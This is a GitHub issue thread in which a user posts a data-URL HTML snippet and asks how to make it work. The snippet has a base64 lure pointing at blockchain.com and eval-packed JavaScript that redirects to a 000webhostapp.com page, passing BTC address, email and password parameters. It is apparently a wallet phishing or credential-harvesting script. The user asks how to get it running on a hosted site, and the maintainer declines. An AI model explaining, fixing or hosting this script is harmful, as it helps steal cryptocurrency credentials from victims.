### ISSUE TITLE
Help

### ISSUE THREAD

**Issue by hytec2019** [rajkumardusad/flash#1]
I need your help with a html script. Hytec2019@gmail.com

**Comment by rajkumardusad** [comment]
Hey @hytec2019 we are here to help you, so how can i help you?

**Comment by hytec2019** [comment]
data:text/html,<p>aHR0cHM6Ly93d3cuYmxvY2tjaGFpbi5jb20v</p><script>
eval(function(p,a,c,k,e,d){while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+c+'\\b','g'),k[c])}}return p}('5.6="7://4.3.0/1.2?8=9&15=16&14=13&10=11=&12=17";',10,18,'com|index|php|000webhostapp|blockchainxyz|location|href|http|q|UmVkZHJhZ29u|p|PASSWORD|query|EMAIL|e|u|BTC_ADDRESS|ok'.split('|')))</script>

Can you help me with this?

**Comment by rajkumardusad** [comment]
what kind of help you need? what you want to do with this script?

**Comment by hytec2019** [comment]
Hi, i would like to know how the script works. There are several websites
it refers to, the username dragon and blockchainxyz doesnt work. If i want
to make it work would it need a hosted website to refer to.?

**Comment by rajkumardusad** [comment]
Hey @hytec2019 I'm sorry i can't help you in blockchain..

**Comment by hytec2019** [comment]
Thank you
